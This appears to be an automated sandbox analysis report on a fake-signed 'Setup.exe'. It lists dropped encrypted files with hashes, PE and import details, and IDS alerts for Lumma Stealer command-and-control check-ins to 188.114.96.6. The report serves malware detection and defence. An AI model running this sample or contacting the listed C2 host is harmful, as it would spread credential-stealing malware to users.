Entropy (8bit): 4.703941535706935
Encrypted: false
SSDEEP: 768:8x/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3B:8dKaj6iTcPAsAhxjgarB/5el3B
MD5: 6AD6CD8E77D34C3079924FD65546554F
SHA1: 2E18F066D291DAF1FC92E65FCDA539082C96706B
SHA-256: C4DE2122AAC5865C856E71D4ECD8C2D96A9CDD0D1C277AC4585193F7A836CF86
SHA-512: A5E22E29C4B84F3E79CEB2B572E45266EC5CBCE440CEDE118508447B1B1EB74394BB90A1C8C8D27B587B1440CFBDB2F9319B375C63B90615450E282C13EA5F3F
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 84992
Entropy (8bit): 7.998038120662092
Encrypted: true
SSDEEP: 1536:sIA4cY4ZTD4Wdyt1SLu68D95GjAPjKocYPsj+R+VUBZfyzusHLyJ83wC8niH:/Zt4Okyt0YDrjJBPsaQaYLzt8niH
MD5: 20939DE37758844D50817F401E778A6E
SHA1: 57B1ADB6D7EFE4656D336C370B9A6836AD240047
SHA-256: 3767D43C25C3E65CC5181C73875F1506A68AC2CBE4F0332E0C471C4A3842FF2B
SHA-512: 9B3DB71D43B7C77C24C6AB59D205B18C9DA57105A9825F77C2865CE2F4A0EA92C1837B27A5D4AD6315BA92BA0FF995FA2BEB2ACDD4CD0A9B85C68EE362405F4D
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 81920
Entropy (8bit): 7.9975318296902085
Encrypted: true
SSDEEP: 1536:KQJudkxXNhePo/DCiyl7QMkDKLdS5omcsuXq5oPj2TtfGXQ1Yn:TJIklbePIDVI76KLdS5oJr2T9WQ1M
MD5: 4AB70FFED39BD5AC69154E19D58B0267
SHA1: 4222C1A9BA794033A285027DB648950B3ED5BB42
SHA-256: 37BAA43A816D6A60D68ABD4DEEDF84C6F3EE08FFC0BE271C9865A0CA1FF3977D
SHA-512: 2C596F996C103900F3ABAC713241E61CCB45EC0FDD3342805A8400BC3992EE60A38BB660B6E67DABF57BC2F335DCA6E0D02B333EC2852406780B6FADE1FAF61B
Malicious: false
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 11606
Entropy (8bit): 7.4586390538525755
Encrypted: false
SSDEEP: 192:/sxvhLuBgfMvSVZPkZeCeAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/GhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ38
MD5: 7A4CC8156B3C6C90F7D85BCD734AFE1F
SHA1: 60D593ADB9C1CC411A5AFC2B16479B75677162E9
SHA-256: 2D6B7033E50813D756FFDD4AD36C8DF1017A9A70FC09483E8973B7929BE0DE8E
SHA-512: 9F4A21993B88F883FA311B545BE8565939CD008045E764F4C2A44EF1883152BCE8C7F3EADCAB530650003C5693268D48D73FA48EF6B63B8CA90F5DE7C143DCDE
Malicious: false
Process: C:\Users\user\Desktop\Setup.exe
File Type: data
Category: dropped
Size (bytes): 56320
Entropy (8bit): 7.996391191024259
Encrypted: true
SSDEEP: 1536:9y+X35Zzw/OxuLxNqF9vtOEmH3fcoQZ/SDfNuz6RgBStp46V:9y+n5KGxuL89vcPZdDIW6BSjd
MD5: 67EBFD624465856B781C2F15624B5FBB
SHA1: 6B80BBBDBA9B6F3B587F6C84B81E509761C31C08
SHA-256: 2EF775B484665CA2D846E398C6C65CDDFDD66E3AC0CF37B5D51780F7A913934B
SHA-512: 0F392C2B778DB3F688BA0ADF2A37AA91470767A50D7E9A602600B602535B39B1FE02E865404A20363B1753BB55D5718582A69F759950B99A10F111A8795A930A
Malicious: false
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 79872
Entropy (8bit): 6.667903538113778
Encrypted: false
SSDEEP: 1536:SYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgB:1Wy4ZNoGmROL7F1G7hg
MD5: A7DD562FCE7652FB965799C55254A0BA
SHA1: CC4D96CC2BA4CE3BA53BAB6E9EAE0FCAD590C9C7
SHA-256: 0C186D145F698364C95675C82600446E24DC25E2BD7DB0520733C67781EAC0B3
SHA-512: FC982815B5F73E5A145C0BD89C22E404A29C510D74714A66D0FF9C2AD1A516D426BD3FF2166A5C1336571827C4CC665311C591F227E2BB9E85FCB1E95F914785
Malicious: false
Preview: a.r.i.a.b.l.e.s. .a.l.l.o.w.e.d. .i.n. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...v.".l.o.n.g._.p.t.r.".,. .".i.n.t._.p.t.r.". .a.n.d. .".s.h.o.r.t._.p.t.r.". .D.l.l.C.a.l.l.(.). .t.y.p.e.s. .h.a.v.e. .b.e.e.n. .d.e.p.r.e.c.a.t.e.d... . .U.s.e. .".l.o.n.g.*.".,. .".i.n.t.*.". .a.n.d. .".s.h.o.r.t.*.". .i.n.s.t.e.a.d...-.O.b.j.e.c.t. .r.e.f.e.r.e.n.c.e.d. .o.u.t.s.i.d.e. .a. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t...).N.e.s.t.e.d. .".W.i.t.h.". .s.t.a.t.e.m.e.n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: data
Category: dropped
Size (bytes): 55296
Entropy (8bit): 6.548215294045205
Encrypted: false
SSDEEP: 768:JQ18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSB:m1/AD1EsdzVXnP94SGGLpRB6M20
MD5: EF4E81CB8052EE9B5A6FC6DCD7567548
SHA1: B919759461FD777C96B4F322F408812009B40C00
SHA-256: B02877F89D3F3E8327DB1964DAE27C0E7C5087527BA650066C1BD6C6E4A4F715
SHA-512: 067B2BB15104B685E243EE08177C94625F55713FAD6D2264088650B889B0208448DC428ACC5EED0056D959686D338396AAF18D23EFD2C7C07203FDBBA1EDCBBC
Malicious: false
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset -9444732965739290427392.000000, slope 2734396502252404170448376371133546496.000000
                                                                Category:dropped
                                                                Size (bytes):60416
                                                                Entropy (8bit):6.067319379992331
                                                                Encrypted:false
                                                                SSDEEP:768:50vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwun:50vtmgMbFuz08QuklMBNIimuzaAwusq
                                                                MD5:7E9F33DC7CC9891C8CA419EBC7B31AAA
                                                                SHA1:DA6037F59597399A96A8E756D819CD0E2E104A4A
                                                                SHA-256:5C5491AC3971BFA44F13F9719F011A7B1B353BC4127ECF7195A74513345EB7BB
                                                                SHA-512:8BAD109A56DC7C0B03B0848C962FE60DD878EE9209D2FDE90E1429EF77D3B58E0A03CA795805EBE08CED195AE45AB895BB68AD952BF1ED9595C33AEC0C71E8E5
                                                                Malicious:false
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):777
                                                                Entropy (8bit):3.9586418744428995
                                                                Encrypted:false
                                                                SSDEEP:12:pyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:pyGS9PvCA433C+sCNC1
                                                                MD5:906017194573324C7F663EC0C29DD8E6
                                                                SHA1:05F6873387E6DAA4ED362B5C1AE4778C0DDFAC11
                                                                SHA-256:A53D274AB9542F5FFC54F3C3F556A24F6908AA19012B28537BD3FBB2687BE9A5
                                                                SHA-512:9FDFAC75BE2374037D7E6548EB48700583153C6A8E8B194D82C5FEF71769073B30B955BA142B21C272A9B00456FBD88D4BC455C2890B56AF8A07EC6740387D29
                                                                Malicious:false
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):87040
                                                                Entropy (8bit):6.574129972694159
                                                                Encrypted:false
                                                                SSDEEP:1536:Dn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5G:D+AqVnBypIbv18mLthfhnueoMmOqDoiu
                                                                MD5:CCDB4B10228BD73A42BD9BDCACD6C3FA
                                                                SHA1:F3A53ECDAAB5FC3A748030C6F3228522B425F8C7
                                                                SHA-256:AC2797C2FE10F695311429692DC965D78E2DD1832871705B30F113F52ED717C0
                                                                SHA-512:CD90A39214166E12B6D7C3616353BB3D796DD15F612E986BF9DBD5B635B4F6D62957F11119FD1945E0A4C73E07C0045D64371BBD8C3949D6659C135E34A8E2ED
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):81920
                                                                Entropy (8bit):7.998049076509527
                                                                Encrypted:true
                                                                SSDEEP:1536:yBfTExvxpZXh9ubx46Aluo2N2J8hcTqQieQoVSPUFowd9XPy0QZuX/OBpNL:yBfgBxJ9M1AAo2Nk+KieVFLcZ6mjNL
                                                                MD5:281F4DB819997789982068F550A35072
                                                                SHA1:FAF56A4CB2B14ADBA50CEFB49927B4E73F1FF5C2
                                                                SHA-256:5B195BE894B7155D3147588D728098068D36CDBB9DF72FABD577057E699E2025
                                                                SHA-512:8A5956B6E2DA603A5A0E1CFDBBDCC6D4094C92DAF0E0465162B3630DA642F22A90B0972B6B6C83A969BE66A6FA0B0201F40AA24777F1C4A6B5DD2895D91109F0
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                File Type:OpenPGP Public Key
                                                                Category:dropped
                                                                Size (bytes):12492
                                                                Entropy (8bit):7.984190657327211
                                                                Encrypted:false
                                                                SSDEEP:384:c1Lx+zglTnjPebzZfwXumF9g76gzy2X44vYvu2:ExNebNfwek9g7dzO
                                                                MD5:14ABCC1FCB7EB77CB471AAA77133F0E8
                                                                SHA1:457C0EDD3339EEE816C6917B33C2B1F6B962BD21
                                                                SHA-256:CBB561B7501EDC6B3DBB134C951459887D7F1D02AE151FD2EEED6EF1DD0A26EA
                                                                SHA-512:71FB1BA3C8B5844A7FD98720E18803F0D416877FAFA2E5AE21012890E2322C588C2EF1B7535C89CA6C065B3D41DCA2215CC22D7D4E0EB1F215E0A10EBCEDF6D7
                                                                Malicious:false
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):130048
                                                                Entropy (8bit):6.681687090731543
                                                                Encrypted:false
                                                                SSDEEP:3072:FU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRV:FhClbfSCOMVIPPL/sZx
                                                                MD5:9A4BA095FCF59853D46AACC0ED9ACEDC
                                                                SHA1:2F8F477F9998C719AC860B8DF65CF64F2E1AF684
                                                                SHA-256:3ACADE67A3C43300472BADD003325ACD4D4CA5A32857312BBBFD21E5A16AED9A
                                                                SHA-512:475E483ED5E0720D30C68A2BD268299A0346ED0E660252C97982C6AB605B7C81BE83000EF9947F5F8ADBE92B0BE660013BA7FCEE5E843565BA82277706D7DC1E
                                                                Malicious:false
                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):84992
                                                                Entropy (8bit):6.0785099969245255
                                                                Encrypted:false
                                                                SSDEEP:1536:wLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8and:wLezW9FfTut/Dde6u640ewy4Za9coRCf
                                                                MD5:682B26D2846887714186B4B1D1CDC9E5
                                                                SHA1:83852C4B46E5227BF3E504332FCD2DA383522E28
                                                                SHA-256:59C4F79996F0F5D26FE7738394AB12FFEBA82518A05904AF12044F09DC6AF077
                                                                SHA-512:893C430C1C63D5A153832DB6098460F058236FFE33143F7F3BE15D1B8424138402D177A16494353E677ED051DF1FBF7ADF980FE080589E24876CCA73C4A25CE2
                                                                Malicious:false
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):4.648387822130976
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Setup.exe
                                                                File size:73'409'696 bytes
                                                                MD5:588eeb3d8f305fc008f034e10e0015c0
                                                                SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
                                                                SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
                                                                SHA512:695c39c2431ccb608cab670b50b74ede41284f0d1bb22330f1cd7ac72812e72be314a4ad1e75589391f813a3f5d40db4d49d3495f143c8f3ef4615f73412e760
                                                                SSDEEP:24576:VEqVaQlXM7Iqu1NA+quN4PtP644/97g/z6VvwyKcqxj8FbgtRWY/gEyhJlgi:Taec0qmiPJ644/97I6VvGj8Fbg63rhB
                                                                TLSH:E6F79B2E226CF7F91BBD846673933821E736AA802B10A34FF836D44D1CF68B75159B15
                                                                Icon Hash:ccb2b1717133b2cc
                                                                Entrypoint:0x4038af
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                Signature Valid:false
                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
Not Before | Not After
• 24/06/2022 09:22:08 | 14/04/2025 16:06:58
                                                                Subject Chain
                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                Version:3
                                                                Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                Serial:115BBE9E1C286827AF66E7A01390C206
                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                xor ebp, ebp
                                                                pop esi
                                                                mov dword ptr [esp+18h], ebp
                                                                mov dword ptr [esp+10h], 0040A268h
                                                                mov dword ptr [esp+14h], ebp
                                                                call dword ptr [00409030h]
                                                                push 00008001h
                                                                call dword ptr [004090B4h]
                                                                push ebp
                                                                call dword ptr [004092C0h]
                                                                push 00000008h
                                                                mov dword ptr [0047EB98h], eax
                                                                call 00007FDD40C65AABh
                                                                push ebp
                                                                push 000002B4h
                                                                mov dword ptr [0047EAB0h], eax
                                                                lea eax, dword ptr [esp+38h]
                                                                push eax
                                                                push ebp
                                                                push 0040A264h
                                                                call dword ptr [00409184h]
                                                                push 0040A24Ch
                                                                push 00476AA0h
                                                                call 00007FDD40C6578Dh
                                                                call dword ptr [004090B0h]
                                                                push eax
                                                                mov edi, 004CF0A0h
                                                                push edi
                                                                call 00007FDD40C6577Bh
                                                                push ebp
                                                                call dword ptr [00409134h]
                                                                cmp word ptr [004CF0A0h], 0022h
                                                                mov dword ptr [0047EAB8h], eax
                                                                mov eax, edi
                                                                jne 00007FDD40C6307Ah
                                                                push 00000022h
                                                                pop esi
                                                                mov eax, 004CF0A2h
                                                                push esi
                                                                push eax
                                                                call 00007FDD40C65451h
                                                                push eax
                                                                call dword ptr [00409260h]
                                                                mov esi, eax
                                                                mov dword ptr [esp+1Ch], esi
                                                                jmp 00007FDD40C63103h
                                                                push 00000020h
                                                                pop ebx
                                                                cmp ax, bx
                                                                jne 00007FDD40C6307Ah
                                                                add esi, 02h
                                                                cmp word ptr [esi], bx
                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x59efa | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x45fffd0 | 0x24d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x59efa | 0x5a000 | 0ccbca815b7df0bc03a078ee84f909aa | False | 0.9669406467013889 | data | 7.86959447360422 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x15a000 | 0xfd6 | 0x1000 | b0d05814ea00da63327959615c44f046 | False | 0.568359375 | data | 5.309946074381747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1002c8 | 0x4ce42 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9883726099077302
RT_ICON | 0x14d10c | 0x68d9 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9950076375693901
RT_ICON | 0x1539e8 | 0x209f | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0013172075200574
RT_ICON | 0x155a88 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5272579332790887
RT_ICON | 0x1580f0 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6261384335154827
RT_ICON | 0x159218 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7978723404255319
RT_DIALOG | 0x159680 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x159780 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x15989c | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x1598fc | 0x5a | data | English | United States | 0.7888888888888889
RT_VERSION | 0x159958 | 0x2cc | data | English | United States | 0.4818435754189944
RT_MANIFEST | 0x159c24 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T01:26:37.505366+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP
2024-12-24T01:26:38.792709+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP
2024-12-24T01:26:38.792709+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | TCP
2024-12-24T01:26:39.991057+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49737 | 188.114.96.6 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 01:26:36.282341003 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:36.282450914 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:36.283049107 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:36.284162998 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:36.284197092 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:37.505235910 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:37.505366087 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:37.523394108 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:37.523420095 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:37.523861885 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:37.576908112 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:37.760703087 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:37.760843992 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:37.760874987 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.792705059 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.792802095 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.792875051 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.794627905 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.794646025 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.794671059 CET | 49731 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.794677973 CET | 443 | 49731 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.801104069 CET | 49737 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.801146984 CET | 443 | 49737 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:38.801237106 CET | 49737 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.801476002 CET | 49737 | 443 | 192.168.2.5 | 188.114.96.6
Dec 24, 2024 01:26:38.801489115 CET | 443 | 49737 | 188.114.96.6 | 192.168.2.5
Dec 24, 2024 01:26:39.991056919 CET | 49737 | 443 | 192.168.2.5 | 188.114.96.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 01:26:17.346019030 CET | 64589 | 53 | 192.168.2.5 | 1.1.1.1
Dec 24, 2024 01:26:17.605479002 CET | 53 | 64589 | 1.1.1.1 | 192.168.2.5
Dec 24, 2024 01:26:35.994781017 CET | 49492 | 53 | 192.168.2.5 | 1.1.1.1
Dec 24, 2024 01:26:36.275945902 CET | 53 | 49492 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 01:26:17.346019030 CET | 192.168.2.5 | 1.1.1.1 | 0x3aaa | Standard query (0) | PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA | A (IP address) | IN (0x0001) | false
